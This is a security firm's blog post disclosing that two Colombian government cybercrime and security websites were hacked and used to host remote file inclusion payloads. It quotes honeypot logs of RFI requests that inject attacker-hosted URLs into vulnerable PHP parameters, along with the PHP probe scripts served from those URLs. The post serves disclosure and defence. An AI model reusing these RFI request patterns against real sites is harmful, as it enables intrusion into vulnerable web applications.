You would expect that a security-related web site would be secure, no? What about an official web site from a Government? Should that be safe? What about a government web site about security? Shouldn't that be ultra super secure? (yes, I am joking :) )

That's not always the case... <marketing plug>At Sucuri Security we have two main goals: Monitor your visible Internet presence (via DNS, site content changes, whois, blacklisting status, etc), and to also monitor what is not visible (or easily accessible). So we run multiple honey pots, we monitor IRC chats used by botnets and attackers, multiple forums, etc. All with the goal to protect our clients and notify them if we see any issue in the "underground"</marketing plug>.

With this work, we get to see a lot of sites being exploited and attacked. Most of them are small sites, but sometimes we see big companies, .govs and many .edus in there.

One of those government web sites are from Colombia. And they are not a normal .gov site, they are about security and about cyber crimes.

They have two web sites that are currently hacked: http://www.delitosinformaticos.gov.co (related to solving cyber crimes) and
http://www.frentesdeseguridad.gov.co (related to security in general). We tried to contact them and got no replies. We would wait a little more to publish it, but since clem1 mentioned them on our post about Georgia government sites hacked, I think it is time to use full-disclosure to get them fixed.

The first time we saw them was on Dec of last year:

a.b.147.154 - - [22/Dec/2009:15:08:51 -0200] "GET //init_basic.php?GALLERY_BASEDIR=http://www.frentesdeseguridad.gov.co/administrator//modules/respon1.txt? HTTP/1.1" 404 36 "-" "Mozilla/5.0"
a.b.147.154 - - [22/Dec/2009:15:08:51 -0200] "GET /xxx/init_basic.php?GALLERY_BASEDIR=http://www.frentesdeseguridad.gov.co/administrator//modules/respon1.txt? HTTP/1.1" 404 36 "-" "Mozilla/5.0"

They were being used in an RFI (remote file inclusion) attack:

$ lynx --source --dump http://www.frentesdeseguridad.gov.co/administrator//modules/respon1.txt< ?php /* Fx29ID */ echo("FeeL"."CoMz"); echo("FeeL"."CoMz"); /* Fx29ID */ ?>

We kept seeing the same attack for a while, with just a few variations (using file id.txt instead of the respon1.txt):

a.b.21.76 - - [27/Jan/2010:09:22:07 -0200] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.frentesdeseguridad.gov.co/administrator/backups/image/id1.txt?? HTTP/1.1" 404 36 "-" "Mozilla/5.0"

That seemed to have stopped on January 28th. Their web sites even went offline, which I hope they were fixing it. However, on February 14th, it started all over:

a.b.147.154 - - [14/Feb/2010:02:49:47 -0200] "GET /xxx//delete_comment.php?board_skin_path=http://www.delitosinformaticos.gov.co/foro/avatars/.bbs/id1.txt??? HTTP/1.1" 404 36 "-" "Mozilla/5.0"
a.b.147.154 - - [14/Feb/2010:02:49:47 -0200] "GET //delete_comment.php?board_skin_path=http://www.delitosinformaticos.gov.co/foro/avatars/.bbs/id1.txt??? HTTP/1.1" 404 36 "-" "Mozilla/5.0"

Same RFI attack:

$ lynx --source --dump http://www.delitosinformaticos.gov.co/foro/avatars/.bbs/id1.txt
< ?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>

Plus, in addition to be hosting the malware, it is also actively scanning/attacking others (their IP is 200.93.147.154):

200.93.147.154 /xxx///bbs//skin/sirini_simplism_gallery_v4/setup.php?dir=http://xx??
200.93.147.154 /xxx///wedding//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=yy??

What's next? Hopefully they will read it and fix the problem.